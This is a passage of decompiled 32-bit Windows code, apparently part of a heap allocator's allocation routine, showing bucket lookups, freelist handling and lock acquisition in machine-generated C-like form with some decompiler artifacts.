																_v93 = 0;
																_v100 = 0xffffffff;
																_t1262 = _v132;
																_t1017 =  *_t1262 & 0x000000ff;
																__eflags = _t1017 - 2;
																if(_t1017 == 2) {
																	_t898 =  *0xd43d89 & 0x000000ff;
																	__eflags = _t898 & 0x00000001;
																	if((_t898 & 0x00000001) != 0) {
																		L00CD7BD0(_t1017, _t1484);
																		_t1262 = _v132;
																	}
																}
																__eflags =  *((char*)(_t1262 + 3));
																_v120 = _t1017;
																if( *((char*)(_t1262 + 3)) == 0) {
																	_t1395 = (_v128 & 0x0000ffff) << 5;
																	_t1440 = _t1262 + _t1395 + 0x48;
																	_t899 = _t1262 + 0x40;
																	_v112 = _t899;
																	__imp__TryAcquireSRWLockExclusive(_t899);
																	__eflags = _t899;
																	if(_t899 == 0) {
																		L00CC8B90(_t899, _v116);
																	}
																	_t900 =  *_t1440;
																	_t1160 = _t1440;
																	_t1421 =  *_t900;
																	__eflags = _t1421;
																	if(_t1421 != 0) {
																		goto L193;
																	} else {
																		_t909 =  &_v97;
																		goto L332;
																	}
																} else {
																	_t1443 =  *( *((intOrPtr*)( *[fs:0x2c] +  *0xd43e38 * 4)) + 0xa0);
																	__eflags = _t1443 - 2;
																	if(_t1443 < 2) {
																		_push( &_v100);
																		_push(_v128 & 0x0000ffff);
																		_t765 = E00CD9960(_v132);
																		goto L98;
																	} else {
																		_t1443[2] = _t1443[2] + 1;
																		asm("adc dword [esi+0xc], 0x0");
																		_t921 = _v128;
																		_t1403 = _t921 & 0x0000ffff;
																		__eflags =  *0xd42d20 - _t921;
																		if( *0xd42d20 < _t921) {
																			_t1443[0xa] = _t1443[0xa] + 1;
																			asm("adc dword [esi+0x2c], 0x0");
																			_t1443[6] = _t1443[6] + 1;
																			asm("adc dword [esi+0x1c], 0x0");
																			goto L190;
																		} else {
																			_t922 =  *(_t1443 + 0x58 + _t1403 * 8);
																			__eflags = _t922;
																			if(_t922 == 0) {
																				_t1443[8] = _t1443[8] + 1;
																				asm("adc dword [esi+0x24], 0x0");
																				_t1443[6] = _t1443[6] + 1;
																				asm("adc dword [esi+0x1c], 0x0");
																				E00CC85A0(_t1443, _t1403);
																				_t922 =  *(_t1443 + 0x58 + _t1403 * 8);
																				__eflags = _t922;
																				if(_t922 != 0) {
																					goto L93;
																				} else {
																					_t1262 = _v132;
																					goto L190;
																				}
																			} else {
																				_t1443[4] = _t1443[4] + 1;
																				asm("adc dword [esi+0x14], 0x0");
																				L93:
																				_t991 =  *(_t1443 + 0x5e + _t1403 * 8) & 0x0000ffff;
																				_t1262 = _t922;
																				_t887 =  *_t922;
																				__eflags = _t887;
																				if(_t887 == 0) {
																					_t1187 = 0;
																					__eflags = 0;
																					goto L97;
																				} else {
																					_t1187 = _t887;
																					asm("bswap ecx");
																					__eflags = _t1187 & 0x001fc000;
																					if((_t1187 & 0x001fc000) == 0) {
																						L156:
																						asm("pcmpeqd xmm0, xmm0");
																						asm("movdqa [esp+0x30], xmm0");
																						_t1438 =  &_v100;
																						_t888 = E00CC88D0(_t1438, 0xd35ac8, _t887, 0);
																						_push(_t1438);
																						E00C90790(_t888);
																						_t1466 = _t1466 + 4;
																						_t1072 = _t991;
																						E00CC8960(_t1072, _t1484);
																						goto L157;
																					} else {
																						asm("prefetcht0 [ecx]");
																						L97:
																						 *((char*)(_t1443 + 0x5c + _t1403 * 8)) =  *((char*)(_t1443 + 0x5c + _t1403 * 8)) - 1;
																						 *(_t1443 + 0x58 + _t1403 * 8) = _t1187;
																						_v100 = _t991;
																						 *_t1443 =  *_t1443 - _t991;
																						__eflags =  *_t1443;
																						_t1360 = _a4;
																						_t765 = _t1262;
																						L98:
																						_t1262 = _v124;
																						__eflags = _t765;
																						_t1029 = _v0;
																						if(_t765 == 0) {
																							_t1403 = _v120 & 0x0000ffff;
																							L190:
																							_t1395 = _t1403 << 5;
																							_t1022 = _t1262 + _t1395 + 0x48;
																							_t919 = _t1262 + 0x40;
																							_v104 = _t919;
																							__imp__TryAcquireSRWLockExclusive(_t919);
																							__eflags = _t919;
																							if(_t919 == 0) {
																								L00CC8B90(_t919, _v108);
																							}
																							_t900 =  *_t1022;
																							_t1421 =  *_t900;
																							__eflags = _t1421;
																							if(_t1421 == 0) {
																								_t909 =  &_v89;
																								_t1160 = _t1022;
																								L332:
																								_t765 = L00CD87D0(_t1160, _v136, _v0, _v128, 0x4000, _t909);
																								_v152 = _t765;
																								__eflags = _t765;
																								if(_t765 == 0) {
																									__imp__ReleaseSRWLockExclusive(_v116);
																									_t1421 = 0;
																									_t1029 = _v0;
																									_t991 = _a8;
																									goto L171;
																								} else {
																									_t1324 = (_v132 >> 0x00000009 & 0x00000fe0) + (_v132 & 0xffe00000) - (( *((_v132 >> 0x00000009 & 0x00000fe0) + (_v132 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																									_t900 = _t1324 + 0x1000;
																									__eflags =  *(_t1324 + 0x100f) & 0x00000008;
																									if(( *(_t1324 + 0x100f) & 0x00000008) != 0) {
																										_t1179 =  &(_t900[8]);
																									} else {
																										_t1179 = _t900[2] + 0xc;
																										__eflags = _t1179;
																									}
																									_t991 =  *_t1179 -  *((intOrPtr*)(_v136 + 0xc));
																									_t1360 = _a4;
																									goto L199;
																								}
																							} else {
																								L193:
																								_t1318 = _v136;
																								_v97 = 0;
																								_t1018 =  *(_t1318 + 0x48 + _t1395 + 0xc);
																								_v128 = _t1018;
																								_t991 = _t1018 -  *((intOrPtr*)(_t1318 + 0xc));
																								_v132 = _t1421;
																								_t1262 =  *_t1421;
																								__eflags = _t1262;
																								if(_t1262 == 0) {
																									_t1162 = 0;
																									__eflags = 0;
																									goto L198;
																								} else {
																									_t1162 = _t1262;
																									asm("bswap ecx");
																									__eflags = (_t1162 ^ _v132) - 0x1fffff;
																									if((_t1162 ^ _v132) > 0x1fffff) {
																										L270:
																										asm("pcmpeqd xmm0, xmm0");
																										asm("movdqa [esp+0x30], xmm0");
																										_t1376 =  &_v104;
																										_t830 = E00CC88D0(_t1376, 0xd35ac8, _t1262, 0);
																										_push(_t1376);
																										E00C90790(_t830);
																										_t1466 = _t1466 + 4;
																										_t1029 = _v148;
																										E00CC8960(_t1029, _t1484);
																										L271:
																										_t1421 = _t1029;
																										_t765 = E00CEC3E0( &_v108, _t1262, _t991, _t1029);
																										_t1466 = _t1466 + 0x10;
																										__eflags = _t765;
																										if(_t765 == 0) {
																											L113:
																											__eflags = _t991;
																											if(_t991 == 0) {
																												_t1377 = 1;
																											} else {
																												_t1377 = _t991;
																											}
																											_t1378 = _t1377 +  *((intOrPtr*)(_t1029 + 0xc));
																											__eflags = _t1378 - _t991;
																											if(_t1378 < _t991) {
																												L352:
																												asm("int3");
																												asm("ud2");
																												L353:
																												asm("int3");
																												asm("ud2");
																												L354:
																												__imp__ReleaseSRWLockExclusive(_v128);
																												_t1360 = 0;
																											} else {
																												_t834 =  *(_t1029 + 2) & 0x000000ff;
																												__eflags = _t834 - 2;
																												_v128 = _t1378;
																												_t1004 = _t1029;
																												if(_t834 == 2) {
																													_t1092 = 0x20;
																													__eflags = _t1378;
																													if(_t1378 != 0) {
																														asm("bsr ecx, edi");
																														_t1092 = 0x3f;
																														__eflags = 0x20;
																													}
																													_t836 = 0x20 - _t1092;
																													__eflags = ( *(0xd35a44 + _t836 * 4) & _t1378) - 1;
																													asm("sbb eax, 0xffffffff");
																													_t1379 =  *((_t1378 >> ( *(0xd35a40 - _t1092) & 0x000000ff) & 0x00000007) + _t836 * 8 + (_t1378 >> ( *(0xd35a40 - _t1092) & 0x000000ff) & 0x00000007) + _t836 * 8 + 0xd3580c) & 0x0000ffff;
																												} else {
																													__eflags = _t834 - 1;
																													if(_t834 != 1) {
																														_t1303 = 0x20;
																														__eflags = _t1378;
																														if(_t1378 != 0) {
																															asm("bsr edx, edi");
																															_t1303 = 0x3f;
																															__eflags = 0x20;
																														}
																														_t867 = 0x20 - _t1303;
																														_t1136 =  *(0xd35a44 + _t867 * 4) & _t1378;
																														__eflags = _t1136 - 1;
																														asm("sbb eax, 0xffffffff");
																														_t869 =  *((_t1378 >> ( *(0xd35a40 - _t1303) & 0x000000ff) & 0x00000007) + _t867 * 8 + (_t1378 >> ( *(0xd35a40 - _t1303) & 0x000000ff) & 0x00000007) + _t867 * 8 + 0xd3580c) & 0x0000ffff;
																														_t1378 - 0x41 = _t869 - 0x76;
																														_t1379 = (_t1303 & 0xffffff00 | _t869 - 0x00000076 > 0x00000000) & (_t1136 & 0xffffff00 | _t1378 - 0x00000041 >= 0x00000000) & 0x000000ff | _t869;
																													} else {
																														_t1138 = _t1378 - 0x101;
																														_t870 = _t1378;
																														__eflags = _t1138 - 0xfefe;
																														if(_t1138 <= 0xfefe) {
																															__eflags = _t1378 == 1;
																															if(_t1378 == 1) {
																																_t1145 = 0x20;
																															} else {
																																asm("bsr ecx, eax");
																																_t1145 = _t1138 ^ 0x0000001f;
																															}
																															__eflags = 1 - _v128;
																															_t870 =  <  ? 1 <<  ~_t1145 : 0xbadbb1 >> 2;
																														}
																														_t1436 = 0x20;
																														__eflags = _t870;
																														if(_t870 != 0) {
																															asm("bsr esi, eax");
																															_t1436 = 0x3f;
																															__eflags = 0x20;
																														}
																														_t1307 = 0x20 - _t1436;
																														_t1308 = (_t870 >> ( *(0xd35a40 - _t1436) & 0x000000ff) & 0x00000007) + _t1307 * 8;
																														__eflags = ( *(0xd35a44 + _t1307 * 4) & _t870) - 1;
																														asm("sbb edx, 0xffffffff");
																														_t1144 =  *(_t1308 + _t1308 + 0xd3580c) & 0x0000ffff;
																														_t870 - 0x41 = _t1144 - 0x76;
																														_t1379 = (_t1308 & 0xffffff00 | _t1144 - 0x00000076 > 0x00000000) & (_t870 & 0xffffff00 | _t870 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1144;
																														__eflags = _t1379;
																													}
																												}
																												_v112 = 0;
																												_v104 = 0xffffffff;
																												_t1262 = _t1004;
																												_t838 =  *_t1004 & 0x000000ff;
																												_v124 = _t838;
																												__eflags = _t838 - 2;
																												if(_t838 == 2) {
																													_t839 =  *0xd43d89 & 0x000000ff;
																													__eflags = _t839 & 0x00000001;
																													if((_t839 & 0x00000001) != 0) {
																														L00CD7BD0(_t1004, _t1484);
																													}
																												}
																												__eflags =  *((char*)(_t1262 + 3));
																												if( *((char*)(_t1262 + 3)) == 0) {
																													_t991 = (_t1379 & 0x0000ffff) << 5;
																													_t1421 = _t1262 + _t991 + 0x48;
																													_v136 = _t1262;
																													_t840 = _t1262 + 0x40;
																													_v116 = _t840;
																													__imp__TryAcquireSRWLockExclusive(_t840);
																													__eflags = _t840;
																													if(_t840 == 0) {
																														L00CC8B90(_t840, _v120);
																													}
																													_t841 =  *_t1421;
																													_t1096 =  *_t841;
																													_v136 = _t1096;
																													__eflags = _t1096;
																													if(_t1096 == 0) {
																														goto L340;
																													} else {
																														_t1295 = _v140;
																														_v116 = 0;
																														_t1425 =  *((intOrPtr*)(_t1295 + 0x48 + _t991 + 0xc));
																														_t991 =  *((intOrPtr*)(_t1295 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1295 + 0xc));
																														_t1262 =  *_v136;
																														__eflags = _t1262;
																														if(_t1262 == 0) {
																															 *_t841 = 0;
																															goto L318;
																														} else {
																															_t1117 = _t1262;
																															asm("bswap ecx");
																															__eflags = (_t1117 ^ _v136) - 0x1fffff;
																															if((_t1117 ^ _v136) > 0x1fffff) {
																																L344:
																																asm("pcmpeqd xmm0, xmm0");
																																asm("movdqa [esp+0x30], xmm0");
																																_t1364 =  &_v100;
																																_t1060 = _t1364;
																																_push(0);
																																_push(_t1262);
																																L323:
																																_push(0xd35ac8);
																																_t789 = E00CC88D0(_t1060);
																																_push(_t1364);
																																goto L324;
																															} else {
																																__eflags = _t1117 & 0x001fc000;
																																if((_t1117 & 0x001fc000) == 0) {
																																	goto L344;
																																} else {
																																	asm("prefetcht0 [ecx]");
																																	 *_t841 = _t1117;
																																	goto L318;
																																}
																															}
																														}
																													}
																												} else {
																													_t1421 =  *( *((intOrPtr*)( *[fs:0x2c] +  *0xd43e38 * 4)) + 0xa0);
																													__eflags = _t1421 - 2;
																													_v116 = _t1379;
																													if(_t1421 < 2) {
																														_t1421 = _t1262;
																														_push( &_v104);
																														_push(_t1379 & 0x0000ffff);
																														_t860 = E00CD9960(_t1421);
																														_t1262 = _t1421;
																														_v140 = _t860;
																														goto L246;
																													} else {
																														 *((intOrPtr*)(_t1421 + 8)) =  *((intOrPtr*)(_t1421 + 8)) + 1;
																														asm("adc dword [esi+0xc], 0x0");
																														_t1010 = _t1379 & 0x0000ffff;
																														__eflags =  *0xd42d20 - _t1379;
																														if( *0xd42d20 < _t1379) {
																															_t1385 = _t1262;
																															 *((intOrPtr*)(_t1421 + 0x28)) =  *((intOrPtr*)(_t1421 + 0x28)) + 1;
																															asm("adc dword [esi+0x2c], 0x0");
																															 *((intOrPtr*)(_t1421 + 0x18)) =  *((intOrPtr*)(_t1421 + 0x18)) + 1;
																															asm("adc dword [esi+0x1c], 0x0");
																															goto L301;
																														} else {
																															_t863 =  *(_t1421 + 0x58 + _t1010 * 8);
																															__eflags = _t863;
																															if(_t863 == 0) {
																																 *((intOrPtr*)(_t1421 + 0x20)) =  *((intOrPtr*)(_t1421 + 0x20)) + 1;
																																asm("adc dword [esi+0x24], 0x0");
																																 *((intOrPtr*)(_t1421 + 0x18)) =  *((intOrPtr*)(_t1421 + 0x18)) + 1;
																																asm("adc dword [esi+0x1c], 0x0");
																																_t1385 = _t1262;
																																E00CC85A0(_t1421, _t1010);
																																_t1262 = _t1385;
																																_t863 =  *(_t1421 + 0x58 + _t1010 * 8);
																																__eflags = _t863;
																																if(_t863 != 0) {
																																	goto L241;
																																} else {
																																	goto L301;
																																}
																															} else {
																																 *((intOrPtr*)(_t1421 + 0x10)) =  *((intOrPtr*)(_t1421 + 0x10)) + 1;
																																asm("adc dword [esi+0x14], 0x0");
																																L241:
																																_t1364 =  *(_t1421 + 0x5e + _t1010 * 8) & 0x0000ffff;
																																_v132 = _t863;
																																_t791 =  *_t863;
																																__eflags = _t791;
																																if(_t791 == 0) {
																																	_t1131 = 0;
																																	__eflags = 0;
																																	goto L245;
																																} else {
																																	_t1131 = _t791;
																																	asm("bswap ecx");
																																	__eflags = _t1131 & 0x001fc000;
																																	if((_t1131 & 0x001fc000) == 0) {
																																		L325:
																																		asm("pcmpeqd xmm0, xmm0");
																																		asm("movdqa [esp+0x30], xmm0");
																																		_t1426 =  &_v92;
																																		_t792 = E00CC88D0(_t1426, 0xd35ac8, _t791, 0);
																																		_push(_t1426);
																																		E00C90790(_t792);
																																		_t1466 = _t1466 + 4;
																																		E00CC8960(_t1364, _t1484);
																																		L326:
																																		_t795 =  &_v96;
																																		_t1064 = _t991;
																																		L327:
																																		_t765 = L00CD87D0(_t1064, _v124, _v0, _v108, 0x4000, _t795);
																																		_v128 = _t765;
																																		__eflags = _t765;
																																		if(_t765 == 0) {
																																			__imp__ReleaseSRWLockExclusive(_v112);
																																			_t1421 = 0;
																																			_t1029 = _v0;
																																			_t991 = _a8;
																																		} else {
																																			_t1302 = (_v108 >> 0x00000009 & 0x00000fe0) + (_v108 & 0xffe00000) - (( *((_v108 >> 0x00000009 & 0x00000fe0) + (_v108 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																																			_t817 = _t1302 + 0x1000;
																																			__eflags =  *(_t1302 + 0x100f) & 0x00000008;
																																			if(( *(_t1302 + 0x100f) & 0x00000008) != 0) {
																																				_t1225 =  &(_t817[8]);
																																			} else {
																																				_t1225 = _t817[2] + 0xc;
																																				__eflags = _t1225;
																																			}
																																			_t991 =  *_t1225 -  *((intOrPtr*)(_v124 + 0xc));
																																			_t1360 = _a4;
																																			L186:
																																			_t1284 = _v144;
																																			_t819 =  *((intOrPtr*)(_t1284 + 0x117c)) +  *(_t817[2] + 0xc);
																																			 *((intOrPtr*)(_t1284 + 0x117c)) = _t819;
																																			_t1083 =  *((intOrPtr*)(_t1284 + 0x1180));
																																			__eflags = _t1083 - _t819;
																																			_t820 =  >  ? _t1083 : _t819;
																																			 *((intOrPtr*)(_t1284 + 0x1180)) =  >  ? _t1083 : _t819;
																																			__imp__ReleaseSRWLockExclusive(_v132);
																																			_t1262 = _v148;
																																			_t1029 = _v0;
																																			_t765 = _v132;
																																			L73:
																																			_t1421 =  *((intOrPtr*)(_t1262 + 0x10)) + _t765;
																																			__eflags = _t1029 & 0x00000002;
																																			if((_t1029 & 0x00000002) != 0) {
																																				__eflags = _v120;
																																				if(_v120 == 0) {
																																					E00D011A0(_t1360, _t1421, 0, _t991);
																																					_t1262 = _v148;
																																					_t1029 = _v0;
																																					_t1466 = _t1466 + 0xc;
																																				}
																																			}
																																			__eflags =  *((char*)(_t1262 + 6));
																																			_t991 = _a8;
																																			if( *((char*)(_t1262 + 6)) != 0) {
																																				__eflags = _t765 & 0x00000fff;
																																				if((_t765 & 0x00000fff) == 0) {
																																					_t1088 = _t765;
																																					_t1262 = _t1088;
																																					_t828 = (_t765 & 0xffe00000) + (_t1088 >> 0x00000009 & 0x00000ff8) + 0x2000;
																																					_t1029 = _v0;
																																				} else {
																																					_t1262 = _t765;
																																					_t828 = _t765 + 0xfffffffc;
																																					__eflags = _t828;
																																				}
																																				 *_t828 = 1;
																																				_t765 = _t1262;
																																			}
																																			__eflags = _v144 - 2;
																																			if(_v144 == 2) {
																																				_t1262 = _t765;
																																				_t765 = _t765 >> 0x15;
																																				__eflags =  *((short*)(_t765 + _t765 + 0xd42d24)) - 0xfffe;
																																				if( *((short*)(_t765 + _t765 + 0xd42d24)) == 0xfffe) {
																																					_v148 = _t1262 & 0xffe00000;
																																					_t765 = 3 << (_t1262 >> 0x00000002 & 0x0000001e);
																																					_t1262 = _t1262 >> 0x00000005 & 0x0000fffc;
																																					asm("lock or [edx+ecx+0x4000], eax");
																																				}
																																				_t1029 = _v0;
																																			}
																																		}
																																		goto L107;
																																	} else {
																																		asm("prefetcht0 [ecx]");
																																		L245:
																																		 *((char*)(_t1421 + 0x5c + _t1010 * 8)) =  *((char*)(_t1421 + 0x5c + _t1010 * 8)) - 1;
																																		 *(_t1421 + 0x58 + _t1010 * 8) = _t1131;
																																		_v104 = _t1364;
																																		 *_t1421 =  *_t1421 - _t1364;
																																		__eflags =  *_t1421;
																																		L246:
																																		_t1105 = _v124;
																																		__eflags = _t1105;
																																		_t765 = _v0;
																																		if(_t1105 == 0) {
																																			_t1385 = _t1262;
																																			_t1010 = _v108 & 0x0000ffff;
																																			L301:
																																			_t991 = _t1010 << 5;
																																			_t1421 = _t1385 + _t991 + 0x48;
																																			_v128 = _t1385;
																																			_t861 = _t1385 + 0x40;
																																			_v108 = _t861;
																																			__imp__TryAcquireSRWLockExclusive(_t861);
																																			__eflags = _t861;
																																			if(_t861 == 0) {
																																				L00CC8B90(_t861, _v112);
																																			}
																																			_t841 =  *_t1421;
																																			_t1121 =  *_t841;
																																			_v128 = _t1121;
																																			__eflags = _t1121;
																																			if(_t1121 == 0) {
																																				L340:
																																				_t765 = L00CD87D0(_t1421, _v140, _v0, _v132, 0x4000,  &_v116);
																																				_v156 = _t765;
																																				__eflags = _t765;
																																				if(_t765 == 0) {
																																					__imp__ReleaseSRWLockExclusive(_v120);
																																					_t1360 = 0;
																																				} else {
																																					_t1292 = (_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) - (( *((_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																																					_t841 = _t1292 + 0x1000;
																																					__eflags =  *(_t1292 + 0x100f) & 0x00000008;
																																					if(( *(_t1292 + 0x100f) & 0x00000008) != 0) {
																																						_t1101 =  &(_t841[8]);
																																					} else {
																																						_t1101 = _t841[2] + 0xc;
																																						__eflags = _t1101;
																																					}
																																					_t991 =  *_t1101 -  *((intOrPtr*)(_v140 + 0xc));
																																					goto L319;
																																				}
																																				goto L254;
																																			} else {
																																				_t1299 = _v132;
																																				_v108 = 0;
																																				_t1425 =  *((intOrPtr*)(_t1299 + 0x48 + _t991 + 0xc));
																																				_t991 =  *((intOrPtr*)(_t1299 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1299 + 0xc));
																																				_t1364 =  *_v128;
																																				__eflags = _t1364;
																																				if(_t1364 == 0) {
																																					__eflags = 0;
																																					goto L317;
																																				} else {
																																					_t1262 = _t1364;
																																					asm("bswap edx");
																																					__eflags = (_t1262 ^ _v128) - 0x1fffff;
																																					if((_t1262 ^ _v128) > 0x1fffff) {
																																						L345:
																																						asm("pcmpeqd xmm0, xmm0");
																																						asm("movdqa [esp+0x30], xmm0");
																																						_t991 =  &_v92;
																																						_t789 = E00CC88D0(_t991, 0xd35ac8, _t1364, 0);
																																						_push(_t991);
																																						L324:
																																						E00C90790(_t789);
																																						_t1466 = _t1466 + 4;
																																						_t791 = E00CC8960(_t1425, _t1484);
																																						goto L325;
																																					} else {
																																						__eflags = _t1262 & 0x001fc000;
																																						if((_t1262 & 0x001fc000) == 0) {
																																							goto L345;
																																						} else {
																																							asm("prefetcht0 [edx]");
																																							L317:
																																							 *_t841 = 0;
																																							L318:
																																							_t1116 = _t841[3] & 0xffffc001 | _t841[3] + 0x00000002 & 0x00003ffe;
																																							__eflags = _t1116;
																																							_t841[3] = _t1116;
																																							L319:
																																							_t1293 = _v140;
																																							_t849 =  *((intOrPtr*)(_t1293 + 0x117c)) +  *(_t841[2] + 0xc);
																																							 *((intOrPtr*)(_t1293 + 0x117c)) = _t849;
																																							_t1421 = _v140;
																																							_t1104 =  *((intOrPtr*)(_t1421 + 0x1180));
																																							__eflags = _t1104 - _t849;
																																							_t850 =  >  ? _t1104 : _t849;
																																							 *((intOrPtr*)(_t1421 + 0x1180)) =  >  ? _t1104 : _t849;
																																							__imp__ReleaseSRWLockExclusive(_v120);
																																							_t1262 = _t1421;
																																							_t765 = _v0;
																																							_t1105 = _v140;
																																							goto L248;
																																						}
																																					}
																																				}
																																			}
																																		} else {
																																			_t991 = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																																			__eflags = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																																			L248:
																																			_t1360 =  *((intOrPtr*)(_t1262 + 0x10)) + _t1105;
																																			__eflags = _t765 & 0x00000002;
																																			if((_t765 & 0x00000002) != 0) {
																																				__eflags = _v120;
																																				if(_v120 == 0) {
																																					_t1421 = _t1262;
																																					_t991 = _t1105;
																																					_t765 = E00D011A0(_t1360, _t1360, 0, _t1105);
																																					_t1466 = _t1466 + 0xc;
																																				}
																																			}
																																			__eflags =  *((char*)(_t1262 + 6));
																																			if( *((char*)(_t1262 + 6)) != 0) {
																																				__eflags = _t1105 & 0x00000fff;
																																				if((_t1105 & 0x00000fff) == 0) {
																																					_t1262 = _t1105;
																																					_t765 = (_t1105 & 0xffe00000) + (_t1105 >> 0x00000009 & 0x00000ff8) + 0x2000;
																																				} else {
																																					_t765 = _t1105 - 4;
																																				}
																																				 *_t765 = 1;
																																			}
																																			__eflags = _v132 - 2;
																																			if(_v132 == 2) {
																																				_t765 = _t1105 >> 0x15;
																																				__eflags =  *((short*)(_t765 + _t765 + 0xd42d24)) - 0xfffe;
																																				if( *((short*)(_t765 + _t765 + 0xd42d24)) == 0xfffe) {
																																					_t765 = _t1105 & 0xffe00000;
																																					_t1262 = 3 << (_t1105 >> 0x00000002 & 0x0000001e);
																																					_t991 = _t1105 >> 0x00000005 & 0x0000fffc;
																																					asm("lock or [ebx+eax+0x4000], edx");
																																				}
																																			}
																																			L254:
																																			_v116 = _t1360;
																																			__eflags = _v128 & 0x00000001;
																																			if((_v128 & 0x00000001) != 0) {
																																				goto L273;
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										} else {
																											_t1360 = _v108;
																											L273:
																											_push(_a12);
																											_push(_a8);
																											_push(_t1360);
																											_t765 = E00CEC3C0();
																											_t1360 = _v116;
																										}
																									} else {
																										__eflags = _t1162 & 0x001fc000;
																										if((_t1162 & 0x001fc000) == 0) {
																											goto L270;
																										} else {
																											asm("prefetcht0 [ecx]");
																											L198:
																											_t1360 = _a4;
																											 *_t900 = _t1162;
																											_t1165 = _t900[3] & 0xffffc001 | _t900[3] + 0x00000002 & 0x00003ffe;
																											__eflags = _t1165;
																											_t900[3] = _t1165;
																											L199:
																											_t1321 = _v136;
																											_t902 =  *((intOrPtr*)(_t1321 + 0x117c)) +  *(_t900[2] + 0xc);
																											 *((intOrPtr*)(_t1321 + 0x117c)) = _t902;
																											_t1167 =  *((intOrPtr*)(_t1321 + 0x1180));
																											__eflags = _t1167 - _t902;
																											_t903 =  >  ? _t1167 : _t902;
																											 *((intOrPtr*)(_t1321 + 0x1180)) =  >  ? _t1167 : _t902;
																											__imp__ReleaseSRWLockExclusive(_v116);
																											_t1262 = _v140;
																											_t1029 = _v0;
																											_t765 = _v136;
																											goto L100;
																										}
																									}
																								}
																							}
																						} else {
																							_t991 = _v92 -  *((intOrPtr*)(_t1262 + 0xc));
																							__eflags = _v92 -  *((intOrPtr*)(_t1262 + 0xc));
																							L100:
																							_t1421 =  *((intOrPtr*)(_t1262 + 0x10)) + _t765;
																							__eflags = _t1029 & 0x00000002;
																							if((_t1029 & 0x00000002) != 0) {
																								__eflags = _v101;
																								if(_v101 == 0) {
																									_t1398 = _t1029;
																									_v136 = _t765;
																									E00D011A0(_t1398, _t1421, 0, _t991);
																									_t765 = _v136;
																									_t1262 = _v140;
																									_t1029 = _t1398;
																									_t1466 = _t1466 + 0xc;
																								}
																							}
																							__eflags =  *((char*)(_t1262 + 6));
																							_t991 = _a8;
																							if( *((char*)(_t1262 + 6)) != 0) {
																								__eflags = _t765 & 0x00000fff;
																								if((_t765 & 0x00000fff) == 0) {
																									_v140 = _t765 & 0xffe00000;
																									_t1262 = _t765;
																									_t907 = _v140 + (_t765 >> 0x00000009 & 0x00000ff8) + 0x2000;
																									_t1029 = _v0;
																								} else {
																									_t1262 = _t765;
																									_t907 = _t765 + 0xfffffffc;
																									__eflags = _t907;
																								}
																								 *_t907 = 1;
																								_t765 = _t1262;
																							}
																							__eflags = _v128 - 2;
																							if(_v128 == 2) {
																								_t1262 = _t765;
																								_t765 = _t765 >> 0x15;
																								__eflags =  *((short*)(_t765 + _t765 + 0xd42d24)) - 0xfffe;
																								if( *((short*)(_t765 + _t765 + 0xd42d24)) == 0xfffe) {
																									_t765 = _t1262 & 0xffe00000;
																									_t1262 = _t1262 >> 0x00000005 & 0x0000fffc;
																									asm("lock or [edx+eax+0x4000], edi");
																								}
																								_t1029 = _v0;
																								L171:
																								_t1360 = _a4;
																							}
																							_v112 = _t1421;
																							__eflags = _v124 & 0x00000001;
																							if((_v124 & 0x00000001) != 0) {
																								L159:
																								_push(_a12);
																								_push(_t991);
																								_push(_t1421);
																								_t765 = E00CEC3C0();
																								_t1466 = _t1466 + 0xc;
																								_t1421 = _v112;
																							}
																							L107:
																							__eflags = _t1421;
																							if(_t1421 == 0) {
																								_t1360 = 0;
																								__eflags = _t1029 & 0x00000001;
																								if(__eflags == 0) {
																									goto L21;
																								}
																							} else {
																								_t821 = _v104;
																								__eflags = _t821 - _t991;
																								L00D00C20(_t1421, _t1360, _t991);
																								_t765 = E00CDB3A0(_t1484, _t1360);
																								_t1360 = _t1421;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t1360 = 0;
										__eflags = _t1262 & 0x00000001;
										if(__eflags == 0) {
											L21:
											_push(_t991);
											_t765 = L00CE5A50(_t765, _t1029, _t1262, __eflags, _t1484);
											goto L22;
										}
									}
								}
							}
							__eflags = _v76 ^ _t1460;
							E00CFE643(_t765, _t991, _v76 ^ _t1460, _t1262, _t1360, _t1421);
							return _t1360;
						} else {
							_t990 = _a4 & 0x0000ffff;
							_push(__ecx);
							_t760 = L00CC80A0(_t990, __ecx, 0);
							_t1474 = _t1463 + 4;
							asm("lock dec dword [edi+0x13d0]");
							_t1358 = _t760;
							 *((intOrPtr*)(_t760 + 8)) =  *((intOrPtr*)(_t760 + 8)) + 1;
							asm("adc dword [eax+0xc], 0x0");
							if( *0xd42d20 < _t990) {
								 *((intOrPtr*)(_t1358 + 0x28)) =  *((intOrPtr*)(_t1358 + 0x28)) + 1;
								asm("adc dword [edi+0x2c], 0x0");
								 *((intOrPtr*)(_t1358 + 0x18)) =  *((intOrPtr*)(_t1358 + 0x18)) + 1;
								asm("adc dword [edi+0x1c], 0x0");
								goto L11;
							} else {
								_t990 = _t990 & 0x0000ffff;
								if( *(_t1358 + 0x58 + _t990 * 8) == 0) {
									 *((intOrPtr*)(_t1358 + 0x20)) =  *((intOrPtr*)(_t1358 + 0x20)) + 1;
									asm("adc dword [edi+0x24], 0x0");
									 *((intOrPtr*)(_t1358 + 0x18)) =  *((intOrPtr*)(_t1358 + 0x18)) + 1;
									asm("adc dword [edi+0x1c], 0x0");
									E00CC85A0(_t1358, _t990);
									_t760 =  *(_t1358 + 0x58 + _t990 * 8);
									__eflags = _t760;
									if(_t760 != 0) {
										goto L6;
									} else {
										goto L11;
									}
								} else {
									 *((intOrPtr*)(_t1358 + 0x10)) =  *((intOrPtr*)(_t1358 + 0x10)) + 1;
									asm("adc dword [edi+0x14], 0x0");
									L6:
									_t1420 =  *(_t1358 + 0x5e + _t990 * 8) & 0x0000ffff;
									_t1261 =  *_t760;
									if(_t1261 == 0) {
										_t1257 = 0;
										__eflags = 0;
										L10:
										 *((char*)(_t1358 + 0x5c + _t990 * 8)) =  *((char*)(_t1358 + 0x5c + _t990 * 8)) - 1;
										 *(_t1358 + 0x58 + _t990 * 8) = _t1257;
